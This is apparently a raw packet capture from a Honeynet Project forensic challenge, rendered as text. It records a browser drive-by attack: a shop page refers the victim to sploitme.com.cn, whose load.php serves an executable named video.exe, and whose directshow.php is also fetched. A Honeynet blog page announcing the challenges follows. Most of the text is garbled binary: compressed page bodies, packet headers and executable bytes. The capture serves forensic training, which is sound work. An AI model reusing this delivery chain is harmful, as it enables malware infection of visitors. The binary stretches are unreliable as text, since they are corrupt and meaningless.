http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c5-7b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=KA66'_RT5E('@s83 PS 0+P~;=K..'_RT5E (@r83 PS 0+P0HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=93 ETag: "661c5-7b-47e61676d81c0" ;=KGRT5'_E@ 84TPI\P_FGET /fg/show.php?s=84c090bd86 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KGRT5'_E@3 83RPFރ P XGET /catalog/includes/languages/english/images/icon.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "66225-c3-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K K66'_RT5E()@s84 PTI^P ;=K-K66'_RT5E(*@s83 PR F8P;=K'_RT5E +@r83 PR F8PbkHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=93 ETag: "66225-c3-47e61676d81c0" ;=Ks]RT5'_E@2 83SP+ PxGET /catalog/includes/languages/german/images/icon.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "662f5-71-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K1^66'_RT5E(,@s83 PS P8;=K '_RT5E -@r83 PS PHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=92 ETag: "662f5-71-47e61676d81c0" ;=KzRT5'_E@/ 83RPF8 P,?GET /catalog/includes/languages/espanol/images/icon.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "6628e-80-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K66'_RT5E(.@s83 PR FP;=Kʽ'_RT5E /@r83 PR FP[HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=92 ETag: "6628e-80-47e61676d81c0" ;=KRT5'_E@8 83SP P.GET /catalog/images/banners/oscommerce.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661d3-22fd-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ;=K66'_RT5E(0@s83 PS P;=K'_RT5E 1@r83 PS PaHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=91 ETag: "661d3-22fd-47e61676d81c0" ;=KuU<<RT5'_E(@ 83SP PK~;=KW<<RT5'_E(@ 83RPF PK;=K '_RT5E2@m84 PTI^P&HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13766 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html }ӞGuT?KE/X1!2PVb$GY>}9Y-*&KHOw߾˹~~w~˿޿>|'O7ӗ<ۛ<}ۛ~g/_|gO_<}O=yO^~v^ Og_<}޽{᳏!{O>OoO>}/o>ߞx~?)ĔKm}7?|㭏n?'Ϟ}/^=ó/^?|w_?}Z$#㥛[dd'û7~~oO>?O^~zmьc>;?}{/>y{޵:_?l=޿{ſ wn;y;S{ys'|o_v x'zʽ?֗֠V_BJ/? ;}~dݿu.mŗ7.o&D%dKc=m ƽ?s7:7|/7r{q{rJto^w|φz8֗o2M5vR_[Ïx&Ag=yzgjsڊw<|f~ODyj_zŇö/oq^;=K '_RT5E3@m84 PTI^P\Z㺅{&1eWR=$w>F=GO9Yc-1Z!ƾj Bl3lL#.qJ,A%9☱Es6{+XB 9Sd`?~c~X5HwzĹ`P֨O`\O[oLה==) i\{q >f660V1ls_[\]O|#ְ[djSX(k#sX?/li[¶~W$h=ڻ2mꭱփ(?cCUZ6ZK.W{k 1Pyŀ 8e djw{ü[&3i=cAM!^y%{ܖLn;fd>Fk6րaSgȌͺcC"zXckPO0^b'L6jYK^:beVi g6r)t|k W~qlhXyìm'+"l&֤e۵b\-Iva.!m8 [n 1Dh6a326.]ә5q1^05-ayO>,k8$%Jf(%kl!0,)0LFC J*ЊD[1C25 q^DZs.`POFk-/慵 a[وX FL|pKO|֚ʁ'v[mwؔ rÎ@6R0 MG\%HvzCa 첝*=_hz/дvM ˑzfb7W%ma]Qzc&ʄ3>rgOt=m6Xr0h.CFX>@S.ٝbPJU5{Ta"03mA7pQv;n1l+6 W$.L+qyͦTPf>v$pf;=KK<<RT5'_E(@ 84TPI^Pg;=K'_RT5E4@n!84 PTFI^P<1gO~(_ h}7`#m~$-WKvr9G$M7BfL_K,H)}@E`zo`bT*փވxsxl\TP&ġ*cWb-PPYpmڻ(2};l6F;^Exz42)p{,s:1,FB3`ИlW:Y f"pLGd|5Bry5hQhvșW`G7 {#C.Bu4{Z;,-|e rR%B3 gw"4V\M(I\kL BaU zkbWXAo'haW;աx~mc y±yL4!rWX3! ߠM؟zULϘ6l ޗ tvM} ]!?2l L-" d2dvy@4XA\ &[;bC9m!ķ""s0y*Yl03+ʶِs@`|RƤp2.DM慱b5Dy/fHG.ljټ`oS ԑ y/3 Gr@4ZVrvlCG9 (ӽl 4`CA0_e?Pl!D_UD HZFFGjOlW&ױ AERpT"!OPCXBI9,Ua ܀M!ʀ;=KB'_E  uR  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K)'_RT5E5@m84 PTI^P6W)Eհ/{9y؋H}IUS{ش@2!a!}9 (kd>$"JdKgDCNb$ Lǎ{kbB5Folҙ %±T~\[~&D7b:* ڔ6cg<1"@`~!p9F|mĔb[nQc7,q8}9{Y9>G!̡IW@< CY@8AJ8,Q pCJ6,b9ĩP *wCc q┒%F@n$آkar2A.A <@iÄX2ӉJ."EcT~䕱9R[v~ L@]Mr*RLmy0n(PS>0#3̥`%u8vE7,g!XCc(7yvvF$6s*QebSIP7 s*Q/0='%X%*E݋~-l@S)~`+8MeO+kأ{`Fay٨K+W9 _gO{3Yyv-c*QWR.gܟz,&6Q%bcb0D=hŸa,8hyQpV|F 8dk(˳!G*|NqFA <$|7?-ߠ~8mk ׇy|6ddĈ}04+Uý{+IMJId/2S$ @Wfv,!a)vl(K%RVj^7^,Noּ+Ma^Y弲c_8/(1Q _ 㔄d_qy 3/cyF=RojmL P6y^ѱ~دBW/J~`}^ =RyL,d9 8R8cx*}^T>/)G;8)m3oƹ{'g\m8._)ԫt&%5/r|uJ–2rH vƆ68\H+|~59h^<"`.zCr9Wm(1pޢ7|L!o+C T,as|b^;=Ki'_RT5E6@m84 PTI^P1yk9lG}' u9,]LW+ ba(>$ԩ:yJZY_LEModdc/#a)yѧ`z܃Wz._$sm*YpâpW=@Gw]( w(~%V$r^u!W}7vg.Ɲb NJ҇=2BՕlDy^Ud]=6P}+9##Id$,s K{>(ѡ*<)'e+KxTMrZs1[!-Nfj|IXTr8"k=jO k+Y3HM~EWǝ29;5vDsp^LO"KȚ.D#|-rnYXc"u6kDsqhM>s0Q_izLwȨ p<=#;pk߱JF [&7&2?9G5Y <@Oo4APSLE3pn@m*HԚK:&tfX:j}^5Hct{:J!BW;Yj;Ba/2*P"3a^[apAuˆ"ra"y9$.FϜ2dʍTT7c,MCl.(9G]M-BvJHB08/=Nz=8ʣ2A|!g4R\f}%U2a}*0cş_dAMl]"v/e2fȒ)C'd'SNTLJ3puE7HJ ïK[ sB$.Ac}\}21CQ{9T۠&e:NLoerC[,Nd u6ÉGļLGRGC_%_Th*RaM)l6Qp86^um1sΫf!Que)C j. SYTk GW[{l<rD"R0Fue:I6 ]"4b*s7e2FTA+8s*Rba.G8m5#H/:X=ǍI%ڥ,|Qߖ pjO[gJ8PPh;=K'_RT5E7@m84 PT>I^P *^y~KJFUᦎ5$y.nI!=̪SQh;]Q:S1J.ȶ":>e^Vy=f|^ʧ pl9$a҇y˞C<qAq^P$]rkv/3ǁ} /_AΎ~1Ŭ~ FPͫBOڱ> '1=ry.~,0>/,͋Ya4/`D΃ȟg>/*[ =yynI>s6/ŏ0w9<ɡJhb.r7MoDnE"ŃkPuRP+ʃ(v:1]"{++0[A üBnzY=t˼6~Qo:ㄒr\vgZm&dyE3Qˡ:Eߵ k;a^m^dG_Bҥ>$#a^ i?CϖC+G` yj%\ȟE~!B{O y"sTYo '/eC8kâyyCaGim^[)Wx4{ϵ"W@Ioz헸AՇra=ЇꏩZ :9~Tq\zb>.sȎ>RrXZr_]n?rm9ʵQF%I"O_J4H=l+xTg+m^ɏJF:_rduO9u{'U6n>uȀ:}̳pnBE=ctM %5kKr{.:;s;b:Al9r+d;WUoۂxw䕃b=tAdb߹ NhPyc`:uΤI8X.cS˵p1XӽSc5}% #[ ދXDI+y䋚>t|žl6a|ʗqx;=K'_RT5E8@m84 PTI^P}>D,F *wSr7.o 7 ~̃#QF5E}pŀR+58ǰh5Pw~ʵ(=ՠTsa,4` Z✪4Jbd_>0;WyUns,`akc%8+k.>ϳld;+5~d"ы@,%?e`Y&{-e6<΋u՛@V; vV/K~a?KlHPNP h}S|%K)Ȏ0򱳳Gq. ըeE9`Ɗh2 X(LqQU* jEY -:{c6@!IeRX"ދNr9ZY%)B{:($AH5vf=^"2=ODN=ZٲVUA 7g/ރEzi)W xyYإކDHeW_Yշ1n{Ln'ں 3=p:dy]@0h+KX(l`K$y҉Tm }Fd~8 m%irʍVC5GƧd,4e<|QDM}8)!; . :ͷj΁ۃz 9K?k'aA}bUX9`Df~ye͍ȳRu^AaרƋ(g3޽6 $cf|2i+{MPMz=;;(tmҩO s^V2d/Ӹ~\'"$WjlXܹ~#Ѯ]ow v(CmV z$6#B81_ԅC=gzW>ѽCq @R_bzQo_h}Q:2*C_s}6Sʡz hSC+aT7&g37VHb=oӼWP1>$ϭzA( # o+z\YHVg׷eXJKB |Qvg~߿X>_?<Զ}lm ~#ã΍ŕup-("ҽAMU^ee[ x%JޑjQ޼$,W>mG VYޚ5KH[P .UJ.}Dg^J`@~XQAAogNAJrKL yaa'p^:yȓ;=K]'_RT5E9@m84 PTϦI^P gB.ug.Z3$f+vޗʺ^GXy ֺf^EjƺcF}tP-|ѱ]kRN-\}8ل4a:rS̶H yc6dS֫*VO}O ]c!g;_yKry;wYg:~QK|_Qu9r__yݻϫyzCwA8t8_GG!0+z7|8/q|W٧v҇[oӼ.دH>$P +8/64n/jD"l p_{L5R_+_UOo pF-HG61s(wDЇo/ r(<i` ~φa;=K'_RT5E:@m84 PTZI^Pi'~%jV+7+ya'5r&+-4AYŰWy^XG2zcxE|>.Ӎ!bđ>ιQőf}^PCWjC-GCƝUm^䙧y<؋]}`.9Txߞ>/<:yUb|_ۜ *c'|E!'=aׇIn)vYHo} 2CWtv>;2nqdIj-6}"7*7ƫx޿w_Jـ xb:ҫS2Ӛi Pz6xK#bm{GkFTkCm`%llj6749S._#ObtgJ u􎨙/Ⱦ{Yݽ3&h$۞'.~rDAGt?a4ࣴcNKjws5+,J 49\Q(hڒj LJ *&&_ ,t9?*‰"8py}x}oQ,b\#%..ׅc=a8WdKtG;vuטjvCO/ޜgNq% r5dTh~o9cCn_7?,h0]Iv G{G$4ܽ;߸SR>/p U͟{ _̫;\6[swڤ/ھ*NI^Df;lx i*kxM7~:AK_l+=Ϯ+7;=KXX'_RT5EJ;@o84 PTI^Prx }TlgwZsa6$l=.q/$;~x*~'}(M:W?ϞGi?!4aG>᮱bW*+u#Y|Ls*%,2^}?a)gxs&xU"ڦ!b}^u_z ^'Gz'W]'y^{یӗc!84c*N1k}rY&(YuR䰎Ke3!fa I=:REtk7|ͯ8cY188)n*8me͝HwΟ8:pSjUT n[弬J.Eزʭ~/'ȇ 3nTϪ# {,0 k؋5 Je>1\"l-gNNl)%+!WfX{]#zL85xzɏx6 hQ,̑{^PUPDhzd6s*&ٚcC T[Urn)|Q6;D=q?_X ~ڔ߸wo~~xpO>i}Lp}gq~px͞;=K<<RT5'_E( @ 84TPI^Pc;=K<<RT5'_E( @ 84TPI^ZPc;=K <<RT5'_E( @ 84TPI^0Pc;=Kn<<RT5'_E(@ 84TPI^0PbTW;=K<<RT5'_E(@ 84TPI^0PM;=KrJJRT5'_E<@ 84TPI^0P%GET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KWs66'_RT5E(<@s84 PT0I_PG;=K'_RT5E=@m84 PT0I_PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL@n 84 PTI_PY6]U1ۉu1=wC=r[$1҉T$tzt$л؋u]]=twJ=t؋u]]=t[=u$1t$tjt$=$L$`vl$ 1ɉL$<t0R$ ?$D$ %$ \$ 'US$]$@rEP@U\$ 0@D$T$L$ $P@0P@tX0@a@t 0P@D$a@K0 $va@t0P@\$ a@QP$P;0@L$P@T$P@$Y$D$a@B$a@Uv'U$ta@&U$ta@&U a@]t&U a@]ᐐU$A@P@D$0Í&'U$A@ÐUVShSjBPLjjjjjhSE1҅t_jjhP1@tKjPhVS1҅t*Sj Vh@@ 1҅uP.e[^]U1WVSUэA1\$Rh@@S~jS& e[^_]USÃtKSZu8jhSjPjhj0hE@@SjlS1]USdÍE$uC   Шu"t> 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEt&uVҀ;=KS'_RT5EA@m84 PTI_P UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBFMu4$MԋUA;=Kn'_RT5EB@m84 PTI_PR% IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@%a@%Da@;=K'_RT5EC@m84 PTDI_P(%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@AB D4@"A;=K'_RT5ED@n)84 PTI_PIB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsig;=KK'_RT5EE@o-84 PT pI_P[nalsprintfstrlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.org;=KJ<<RT5'_E(@ 84TPI_P6 ;=K<<RT5'_E(@ 84TPI_DP*;=K<<RT5'_E(@ 84TPI_ pP*;=Kb<<RT5'_E(@ 84TPI_P;=K,5JJRT5'_E<@ 84TPI_PMGET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=K566'_RT5E(F@s84 PTI`+P;=KW'_RT5EG@m84 PTI`+PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEt&uVҁ;=KLc'_RT5EK@m84 PT'I`+PUN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBFMu4$MԋUA;=Kuc'_RT5EL@m84 PT-CI`+P^ IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@%a@%Da@;=Kc'_RT5EM@m84 PT2I`+P3%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@AB D4@"A;=Kc'_RT5EN@m84 PT8I`+PtB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsignalsprintfstrlenstrncmpMessageBoxA;=Kcmm'_RT5E_O@o_84 PT>_I`+P````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.org;=Kk<<RT5'_E(@ 84TPI`+3P DIEGE;=Kk<<RT5'_E(@ 84TPI`+'PB DIEGE;=Kim<<RT5'_E(@ 84TPI`+2P DIEGE;=Km<<RT5'_E(@ 84TPI`+>_P FHEPF;=K<<RT5'_E(@ 84TPI`+BP) FHEPF;=Kp'_E  uS  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=KLLRT5'_E>&@ 84TPI`+BPGET /fg/directshow.php HTTP/1.1 Accept: */* Referer: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KY66'_RT5E(P@s84 PTBIaAP;=K'_RT5EQ@q84 PTBIaAPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:44 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-Length: 63 Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Content-Type: image/jpeg  4 ;=K`<<RT5'_E((@ 84TPIaAD0Pg DIEGE;=Kl LLRT5'_E>)g 5*n᪩wwwhoneynetorg;=K \\'_RT5ENR@ 5:miwwwhoneynetorg  @r;=Kë >>RT5'_E0*@6 @rWPՁ6p;=K: ::'_RT5E,S@}@r PW|Ձ7`:P;=K <<RT5'_E(,@6 @rWPՁ7|PW FHEPF;=K RT5'_E-@4 @rWPՁ7|P_GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.honeynet.org Connection: Keep-Alive Cookie: SESS0f916077214db25d3c25b38417a57722=c3c14637ee4fa2f3ced7dfe9b7f77eb9; __utma=121888786.1305690527.1264085162.1265128952.1265310286.5; __utmz=121888786.1264085162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=121888786.1.10.1265310286 ;=K 66'_RT5E(T@@r PW|ՃPPA;=K'_E1  uT  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K'_RT5EU@@r PW|ՃPhHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:45 GMT Server: Apache X-Powered-By: PHP/4.3.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 02 Feb 2010 19:06:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 6c34 Honeynet Project Blog | The Honeynet Project
    To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

    Honeynet Project Blog

    First challenge of the Forensic Challenge 2010 has been posted.

    Main blog - Mon, 01/18/2010 - 07:21
    We have just posted the first challenge of the Forensic Challenge 2010. The first challenge deals with a network attack. It has been provided by Tillmann Werner from the Giraffe Chapter. It is accessible at https://honeynet.org/node/504. Submissions are due on Monday, February 1st 2010 and results will be released on Monday, February 15th 2010. The top three submissions will be awarded with small prizes. Check it out!

    Challenge 1 of the Forensic Challenge 2010 - pcap attack trace

    Main blog - Mon, 01/18/2010 - 06:18
    Forensic Challenge 2010 Challenge 1 - pcap attack trace - (provided by Tillmann Werner from the Giraffe Chapter) is to investigate a network attack.

    Send submissions (please use the MS word submission template or the Open Office submission template) forensicchallenge2010@honeynet.org no later then 17:00 EST, Monday, February 1st 2010. Results will be released on Monday, February 15th 2010. Small prizes will be awarded to the top three submissions.


    Skill Level: Intermediate

    The Challenge:

    A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

    1. Which systems (i.e. IP addresses) are involved? (2pts)
    2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
    3. How many TCP sessions are contained in the;=K '_RT5EZ@@r PW"ՃP dump file? (2pts)
    4. How long did it take to perform the attack? (2pts)
    5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
    6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
    7. What specific vulnerability was attacked? (2pts)
    8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
    9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
    10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
    11. Do you think this is a manual or an automated attack? Why? (2pts)
    Download:
    attack-trace.pcap_.gz Sha1: 0f5ddab19034b2656ec316875b527d9bff1f035f

    Announcing the Honeynet Project Forensic Challenge 2010

    Main blog - Tue, 01/12/2010 - 17:34

